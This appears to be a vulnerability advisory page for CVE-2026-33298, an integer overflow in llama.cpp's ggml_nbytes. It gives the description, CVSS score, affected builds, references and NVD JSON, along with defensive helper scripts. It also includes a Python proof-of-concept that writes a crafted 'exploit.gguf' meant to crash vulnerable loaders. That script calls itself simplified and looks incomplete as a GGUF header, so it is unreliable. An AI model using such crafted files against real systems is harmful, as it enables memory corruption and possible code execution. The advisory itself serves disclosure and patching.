CVE-2026-33298

Description

llama.cpp provides inference for several LLM models in C/C++. Prior to build b7824, an integer overflow in the `ggml_nbytes` function allows an attacker to bypass memory validation by crafting a GGUF file with specific tensor dimensions. The overflow causes `ggml_nbytes` to return a size far smaller than the tensor actually requires (e.g., 4 MB instead of exabytes), leading to a heap-based buffer overflow when the application subsequently processes the tensor. The resulting memory corruption may allow Remote Code Execution (RCE). Build b7824 contains a fix.
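
The wraparound described above can be illustrated with a small sketch. Python integers never overflow, so the snippet emulates a fixed-width unsigned multiply with a bit mask. The function names (`wrapping_nbytes`, `checked_nbytes`) and the plain elements-times-type-size formula are assumptions made for illustration; this is not ggml's actual `ggml_nbytes` code or the fix shipped in b7824.

```python
from math import prod

def wrapping_nbytes(dims, type_size, bits=64):
    """Emulate an unchecked size computation in fixed-width unsigned arithmetic."""
    mask = (1 << bits) - 1
    total = type_size
    for d in dims:
        # Keep only the low `bits` bits, as C unsigned arithmetic would.
        total = (total * d) & mask
    return total

def checked_nbytes(dims, type_size, bits=64):
    """Same computation, but reject any result that does not fit in `bits` bits."""
    limit = (1 << bits) - 1
    # Exact product: Python ints are arbitrary precision.
    total = prod(dims) * type_size
    if total > limit:
        raise OverflowError(f"tensor size {total} exceeds the {bits}-bit range")
    return total

if __name__ == "__main__":
    dims = [0x10000, 0x10000]  # illustrative values, 32-bit width assumed
    print(hex(wrapping_nbytes(dims, 4, bits=32)))
    try:
        checked_nbytes(dims, 4, bits=32)
    except OverflowError as exc:
        print("rejected:", exc)
```

A loader that validates buffer bounds against the wrapped value would accept the tensor, whereas the checked variant fails before any allocation or copy takes place.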

CVSS Details

CVSS Score

7.8

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
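
As a worked check, the 7.8 base score can be recomputed from the vector string. The sketch below follows the CVSS v3.1 base-score equations for the Scope: Unchanged case only; the function names are illustrative, and the weights are the published v3.1 metric values.

```python
import math

# Metric weights from the CVSS v3.1 specification (Scope: Unchanged only).
WEIGHTS = {
    "AV": {"N": 0.85, "A": 0.62, "L": 0.55, "P": 0.2},
    "AC": {"L": 0.77, "H": 0.44},
    "PR": {"N": 0.85, "L": 0.62, "H": 0.27},
    "UI": {"N": 0.85, "R": 0.62},
    "C": {"H": 0.56, "L": 0.22, "N": 0.0},
    "I": {"H": 0.56, "L": 0.22, "N": 0.0},
    "A": {"H": 0.56, "L": 0.22, "N": 0.0},
}

def roundup(value):
    """CVSS v3.1 Roundup: smallest number with one decimal place >= value."""
    scaled = round(value * 100000)
    if scaled % 10000 == 0:
        return scaled / 100000.0
    return (math.floor(scaled / 10000) + 1) / 10.0

def base_score(vector):
    """Compute the base score of a CVSS v3.1 vector with unchanged scope."""
    # Skip the leading "CVSS:3.1" prefix, then split "AV:L" into ("AV", "L").
    parts = dict(item.split(":") for item in vector.split("/")[1:])
    if parts["S"] != "U":
        raise ValueError("this sketch only handles Scope: Unchanged")
    w = {metric: WEIGHTS[metric][parts[metric]] for metric in WEIGHTS}
    iss = 1 - (1 - w["C"]) * (1 - w["I"]) * (1 - w["A"])
    impact = 6.42 * iss
    exploitability = 8.22 * w["AV"] * w["AC"] * w["PR"] * w["UI"]
    if impact <= 0:
        return 0.0
    return roundup(min(impact + exploitability, 10))

if __name__ == "__main__":
    print(base_score("CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"))  # 7.8
```

The local attack vector and required user interaction reflect that a victim has to open the crafted GGUF file.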

Configurations (Affected Products)

cpe:2.3:a:ggml:llama.cpp:*:*:*:*:*:*:*:* - VULNERABLE

llama.cpp < b7824
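
A deployment can be checked against this range with a small helper. The sketch assumes release tags have the form `b<number>` (as in `b7824`) and that build numbers increase monotonically; `is_affected` is a hypothetical name, not part of llama.cpp.

```python
import re

FIXED_BUILD = 7824  # per the advisory, b7824 contains the fix

def is_affected(tag):
    """Return True if a build tag such as 'b7823' predates the fixed build."""
    match = re.fullmatch(r"b(\d+)", tag.strip())
    if match is None:
        raise ValueError(f"unrecognized build tag: {tag!r}")
    return int(match.group(1)) < FIXED_BUILD

if __name__ == "__main__":
    for tag in ("b7823", "b7824", "b8000"):
        print(tag, "affected" if is_affected(tag) else "not affected")
```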

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

#!/usr/bin/env python3
# PoC for CVE-2026-33298: Integer Overflow in llama.cpp ggml_nbytes
# This script demonstrates how to craft a tensor dimension that triggers an overflow.

import struct

def create_malicious_gguf_header():
    # GGUF Magic Number
    magic = b'GGUF'
    version = struct.pack('<I', 3)  # GGUF version 3
    tensor_count = struct.pack('<Q', 1) # 1 Tensor
    
    # Tensor Name
    name_len = struct.pack('<Q', 4)
    name = b'test'
    
    # Tensor Dimensions (n_dims)
    n_dims = struct.pack('<I', 2) # 2 dimensions
    
    # Exploit idea: choose dimensions so that (dim1 * dim2 * type_size) overflows.
    # The tensor type could be quantized, e.g. Q4_0 (32 elements per block), or
    # simply F32 (4 bytes per element). With F32, elements = dim1 * dim2.
    # Example: elements = 0x100000000 and type_size = 4 gives total = 0x400000000,
    # which wraps to 0 in 32-bit arithmetic.
    
    # Triggering the overflow in ggml_nbytes calculation
    # We want a huge number of elements that wraps to a small size
    dim1 = 0x10000
    dim2 = 0x10000  # Product = 0x100000000
    
    # Pack dimensions
    dims = struct.pack('<Q', dim1) + struct.pack('<Q', dim2)
    
    # Tensor Type (e.g., F32 = 0)
    tensor_type = struct.pack('<I', 0) 
    
    # Offset to tensor data (arbitrary for PoC)
    offset = struct.pack('<Q', 1024)
    
    # Constructing a minimal malicious structure (Simplified)
    payload = magic + version + tensor_count + name_len + name + n_dims + dims + tensor_type + offset
    
    print("[+] Malicious GGUF structure generated.")
    print("[+] Dimensions: {} x {}".format(dim1, dim2))
    print("[+] Attempting to save to 'exploit.gguf'...")
    
    with open('exploit.gguf', 'wb') as f:
        f.write(payload)
    
    print("[+] File saved. Load this in a vulnerable llama.cpp version to trigger the crash.")

if __name__ == "__main__":
    create_malicious_gguf_header()

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-33298
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-33298
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-33298/
[4] VulDB https://vuldb.com/cve/CVE-2026-33298
[5] https://github.com/ggml-org/llama.cpp/releases/tag/b7824
[6] https://github.com/ggml-org/llama.cpp/security/advisories/GHSA-96jg-mvhq-q7q7

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-33298", "sourceIdentifier": "[email protected]", "published": "2026-03-24T01:17:01.870", "lastModified": "2026-04-30T17:01:02.417", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "llama.cpp is an inference of several LLM models in C/C++. Prior to b7824, an integer overflow vulnerability in the `ggml_nbytes` function allows an attacker to bypass memory validation by crafting a GGUF file with specific tensor dimensions. This causes `ggml_nbytes` to return a significantly smaller size than required (e.g., 4MB instead of Exabytes), leading to a heap-based buffer overflow when the application subsequently processes the tensor. This vulnerability allows potential Remote Code Execution (RCE) via memory corruption. b7824 contains a fix."}, {"lang": "es", "value": "llama.cpp es una inferencia de varios modelos LLM en C/C++. Antes de b7824, una vulnerabilidad de desbordamiento de entero en la función `ggml_nbytes` permite a un atacante eludir la validación de memoria al crear un archivo GGUF con dimensiones de tensor específicas. Esto hace que `ggml_nbytes` devuelva un tamaño significativamente menor al requerido (por ejemplo, 4MB en lugar de Exabytes), lo que lleva a un desbordamiento de búfer basado en montículo cuando la aplicación procesa posteriormente el tensor. Esta vulnerabilidad permite una posible ejecución remota de código (RCE) a través de corrupción de memoria. b7824 contiene una corrección."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "baseScore": 7.8, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-122"}, {"lang": "en", "value": "CWE-190"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:ggml:llama.cpp:*:*:*:*:*:*:*:*", "versionEndExcluding": "b7824", "matchCriteriaId": "471181FC-F68E-43C2-AC26-06D790AEE75F"}]}]}], "references": [{"url": "https://github.com/ggml-org/llama.cpp/releases/tag/b7824", "source": "[email protected]", "tags": ["Release Notes"]}, {"url": "https://github.com/ggml-org/llama.cpp/security/advisories/GHSA-96jg-mvhq-q7q7", "source": "[email protected]", "tags": ["Exploit", "Vendor Advisory"]}]}}
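
A record of this shape can be reduced to the fields most useful for triage. The sketch below works on a trimmed copy of the record (only the `weaknesses` and `configurations` keys are kept), and `summarize` is a hypothetical helper name rather than part of any NVD client library.

```python
import json

# Trimmed copy of the record above, kept small for illustration.
RECORD_TEXT = """
{"cve": {"id": "CVE-2026-33298",
  "weaknesses": [{"type": "Primary", "description": [
    {"lang": "en", "value": "CWE-122"}, {"lang": "en", "value": "CWE-190"}]}],
  "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [
    {"vulnerable": true,
     "criteria": "cpe:2.3:a:ggml:llama.cpp:*:*:*:*:*:*:*:*",
     "versionEndExcluding": "b7824"}]}]}]}}
"""

def summarize(text):
    """Extract the CVE id, CWE ids, and first fixed versions from a record."""
    cve = json.loads(text)["cve"]
    cwes = [
        entry["value"]
        for weakness in cve.get("weaknesses", [])
        for entry in weakness["description"]
    ]
    fixed_in = [
        match["versionEndExcluding"]
        for config in cve.get("configurations", [])
        for node in config["nodes"]
        for match in node["cpeMatch"]
        if match.get("vulnerable") and "versionEndExcluding" in match
    ]
    return {"id": cve["id"], "cwes": cwes, "fixed_in": fixed_in}

if __name__ == "__main__":
    print(summarize(RECORD_TEXT))
```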